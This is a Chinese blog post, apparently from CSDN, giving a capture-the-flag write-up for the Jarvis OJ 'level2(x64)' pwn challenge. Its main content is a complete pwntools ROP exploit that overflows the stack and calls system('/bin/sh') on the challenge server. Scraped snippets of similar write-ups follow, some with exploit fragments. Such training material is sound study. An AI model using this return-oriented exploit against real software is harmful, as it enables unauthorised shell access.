[Jarvis OJ - PWN]——[XMAN]level2(x64)

最新推荐文章于 2021-05-13 12:59:28 发布
原创 最新推荐文章于 2021-05-13 12:59:28 发布 · 881 阅读 · 0 ·
本内容遵循CC 4.0 BY-SA版权协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文介绍了JarvisOJ-PWN level2(x64)题目的解题思路及实践过程。通过checksec确认了程序的安全特性,并在IDA中找到了system函数。利用read函数实现栈溢出攻击,最终通过精心构造的payload实现了shell的获取。

[Jarvis OJ - PWN]——[XMAN]level2(x64)

  • 题目地址:https://www.jarvisoj.com/challenges
  • 题目:
    在这里插入图片描述
    checksec一下,是64位程序。开启了NX保护在这里插入图片描述
    在IDA看一下,main函数中有我们要的system函数,
    在这里插入图片描述
    vulnerable_function函数中也有。不过可惜参数都不对,任取一个system地址就好就好。但是我们找到了栈溢出的利用函数read。buf距离rbp的距离为0x80
    在这里插入图片描述
    请添加图片描述请添加图片描述请添加图片描述

查找一下看看有没有**"/bin/sh"字符串,发现地址在0x0600A90**
在这里插入图片描述

**因为是64位程序,所以函数的前六个参数依次会使用rdi、rsi、rdx、rcx、r8、r9寄存器进行传递。system只有一个参数,使用的寄存器是rdi。**查找一下汇编指令pop rdi的地址,0x04006b3
在这里插入图片描述
所以exploit为

from pwn import *
p = remote("pwn2.jarvisoj.com",9882)
binsh = 0x0600A90
pop_rdi=0x04006b3
sys = 0x0400603 #0x040063E 0x04004C0 
payload = 'a'*(0x80 + 0x8)
payload += p64(pop_rdi)+ p64(binsh) #将"/bin/sh"pop到rdi寄存器中
payload += p64(sys) #执行system函数
p.recvline()
p.sendline(payload)
p.interactive()
(Jarvis Oj)(Pwn) level2(x64)
Nothing
04-19 1551
(Jarvis Oj)(Pwn) level2(x64) 首先用checksec查一下保护,和level2一样。 反汇编,程序和32位的程序几乎一致。找到溢出点。 那么溢出思路也和32位的差不多,唯一不同的是,64位程序在调用system函数时,参数的传递方式和32位不一样,32位是通过栈传参,而64位通过edi寄存器传参,所以这时我们的思路变成如何覆盖edi的值,通过基本rop就可...
[Jarvis OJ - PWN]——[XMAN]level3_x64
Y_peak的博客
02-08 418
[Jarvis OJ - PWN]——[XMAN]level3_x64 题目地址:https://www.jarvisoj.com/challenges 题目: 老样子,还是先checksec一下,再看看IDA,除了64位以外和[XMAN]level3一样 64位和32位的主要区别就是参数方面,64位当参数小于等于六的时候,是放在寄存器中,没有放在栈上。分别是rdi rsi rdx rcx r8 r9寄存器。所以我们需要找一些pop指令来将参数写入寄存器。 虽然没有找到pop rdx指令,但
leetcode刷题_OJ 88
cyanchen666的博客
07-27 2835
Given two sorted integer arrays nums1 and nums2, merge nums2 into nums1 as one sorted array. Note: The number of elements initialized in nums1 and nums2 are m and n respectively. You may assume that...
Bugku CTF Web16 WP
u011250160的博客
04-21 2017
这道题本身不是多难,但还是想写篇文章记录一下 首先我是用dirsearch扫了一下敏感文件 然后访问了index.php.bak得到代码 提示:index.php.bak最上头说明是用phpstrom写的 phpstrom的项目会自动添加文件夹.idea,里面的文件可能会造成信息泄露 include_once "flag.php"; ini_set("display_errors", 0); $str = strstr($_SERVER['REQUEST_URI'], '?');//得到我们传递进去的参数
Bugku Web33
JJT
05-13 447
Bugku Web33 描述:fR4aHWwuFCYYVydFRxMqHhhCKBseH1dbFygrRxIWJ1UYFhotFjA= 下载文件,是一段php代码,提示给的字符串应该就是flag加密后得到的字符串,现在需要对其解密,得到flag,代码如下 <?php function encrypt($data,$key) { $key = md5('ISCC'); #729623334f0aa2784a1599fd374c120d $x = 0; $len = strle
Jarvis OJ [XMAN]level2(x64)
九层台
07-07 1251
liu@liu-F117-F:~/桌面/oj/level2_x64$ checksec level2_x64 [*] '/home/liu/\xe6\xa1\x8c\xe9\x9d\xa2/oj/level2_x64/level2_x64' Arch: amd64-64-little RELRO: No RELRO Stack: No canary fo...
18.9.19 Jarvis OJ PWN----[XMAN]level2(x64)
qq_42192672的博客
09-19 387
先checksec一下 可以栈溢出,我们可以看到文件里有system函数,有/bin/sh字符串,美滋滋 64位函数的参数传递顺序和32位不同,传参顺序:rdi,rsi,rdx,rcx,r8,r9,栈,所以要把\bin\sh的地址放到rdi里 找一下可溢出的地方,在read函数里 关键点其实就是找出rdi地址(参考大佬的教学) 指令语句:ROPgadget --binary le...
jarvisoj——[XMAN]level1
王嘟嘟的博客
07-15 707
题目 Wp 先查一下基本的内容 可以看到 RELRO: Partial RELRO就是got表可写的意思,然后ida接着看看源码,这里就是说调用了一个无参的函数 这里看到很明显的是一个溢出,但是这里没有shellcode,就需要自己写一个了 这里可以看到print打印了buf的地址 这里写一个pwntools的脚本 from pwn import * sh = remote("pwn2.jarvisoj.com",9877) shellcode = asm(shellcraft.i386.
[XMAN]level5 Jarvis OJ
九层台
07-10 1229
思路:bss段刚开始是不可执行的,从通用的想要执行bss必须执行mprotect函数来更改bss段的权限(改为7即可读可写可执行)。但是想要获取到mprotect函数必须获取到libc版本。还是少不了上次的泄露libc函数,这里泄露的时候也直接用通用gedit减少不必要的操作,减少错误。 泄露获取libc–&amp;gt;获取到mprotect函数来改写bss段的权限–&amp;gt;把shellcode写入到...
18.9.20 Jarvis OJ PWN----[XMAN]level3(x64)
qq_42192672的博客
09-20 531
解压之后有两个文件,其中一个是lib,checksec后发现没有栈保护,wo,好想知道该怎么做了 拖进IDA看一下哪里可以溢出 read函数可以溢出 然后根据偏移量把system函数和/bin/sh在内存的位置提取出来 同样采取rop代码,注意64位的传参数顺序哦 上脚本 #代码主体 write_got=bin.got['write'] write_plt=bin.plt['w...
jarvisoj_level2_x64
、moddemod
06-17 727
exp #!/usr/bin/env python3 # coding=utf-8 from pwn import * context(log_level = 'debug') proc_name = './level2_x64' p =process(proc_name) p = remote('node3.buuoj.cn', 25838) elf = ELF(proc_name) system_addr = elf.sym['system'] bin_sh_str = 0x600a90 pop..
CTF PWN [XMAN]level2(x64)
qq_41743240的博客
04-08 504
CTF PWN [XMAN]level2(x64) 题目地址 首先进行checksec保护机制的查询 发现只开了NX,所以不能利用shellcode方式获取shell,这里采用ROP方式获取shell IDA反编译查看伪源码 程序非常简单,两个函数 main: vulnerable_function: 在vulnerable_function有个问题,buf申请空间为0x80字节,然而可以读...
CTF-PWN-level2(x64)(Jarvis OJ)
SuperGate的博客
02-15 597
这道题和level2的32位版本的漏洞一样,不过32位程序函数的参数是压在栈中的,而64位程序的前6个参数是存在寄存器中的,第7个开始才压入栈中。 由于我们的目的是将system函数的参数改为/bin/sh,所以我们考虑用pop edi ret 语句将字符串赋值给edi。 同样的,程序中hint存入了/bin/sh,我们直接使用即可。 system函数的地址也很容易获得,剩下的就是pop e...
PWN_JarvisOJ_Level2_x64
michaelinfinity的博客
03-16 1644
关于level2我就不多做赘述了。这道题和level2之间的区别就是一个是32位的栈溢出,另一个就是64位的栈溢出。 32位的函数在调用栈的时候是: 调用函数地址-&gt;函数的返回地址-&gt;参数n-&gt;参数n-1....-&gt;参数1 64位的函数在调用栈的时候是: 前六个参数按照约定存储在寄存器:rdi,rsi,rdx,rcx,r8,r9中。 ...
Jarvis OJ- [XMAN]level2/3_x64-Writeup——64位简单栈溢出
weixin_30537391的博客
12-01 135
两道64位栈溢出,思路和之前的32位溢出基本一致,所以放在一起 在这两道中体现的32位和64位的主要区别在于函数参数传递的方式 在32位程序运行中,函数参数直接压入栈中     调用函数时栈的结构为:调用函数地址->函数的返回地址->参数n->参数n-1->···->参数1 在64位程序运行中,参数传递需要寄存器     64位参数传递约定:前六个参数按顺序...
18.9.25 Jarvis OJ PWN----[XMAN]level5
qq_42192672的博客
09-25 714
题目提示: 参考链接:https://veritas501.space/2017/03/10/JarvisOJ_WP/                   https://blog.csdn.net/github_36788573/article/details/80178146 mmap和mprotect练习,假设system和execve函数被禁用,请尝试使用mmap和mprotect完...
[JarvisOj][XMAN]level2(x64)
weixin_33770878的博客
07-31 144
在32位程序运行中,函数参数直接压入栈中     调用函数时栈的结构为:调用函数地址->函数的返回地址->参数n->参数n-1->···->参数1 在64位程序运行中,参数传递需要寄存器     64位参数传递约定:前六个参数按顺序存储在寄存器rdi, rsi, rdx, rcx, r8, r9中     参数超过六个时,从第七个开始压入栈中 ...
[Jarvis OJ - PWN]——[XMAN]level1
Y_peak的博客
02-01 480
[Jarvis OJ - PWN]——[XMAN]level1 题目地址:https://www.jarvisoj.com/challenges 题目: 先checksec一下,什么保护都没有开。32位程序。 看看IDA,找到了可以利用的栈溢出的read函数. 开开心心的去找system函数.找了半天没找到,同时也没有/bin/sh字符串 并且这道题什么保护都没开,应该是ret2shellcode的pwn题.buff2的地址题目给输出了出来.所以 exp: from pwn import *
[Jarvis OJ - PWN]——Typo(内涵peak小知识)
Y_peak的博客
02-17 458
[Jarvis OJ - PWN]——Typo 题目地址: https://www.jarvisoj.com/challenges 题目: 还是先check一下, 是arm架构。还是第一次遇到。 peak小知识 和x86架构不同, arm架构arm 下的函数调用规定, 函数的第 1 ~ 4 个参数分别保存在 r0 ~ r3 寄存器中, 剩下的参数从右向左依次入栈, 被调用者实现栈平衡,函数的返回值保存在 r0 中。除此之外,arm 的 b/bl 等指令实现跳转; pc 寄存器相当于 x86 的 ei
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值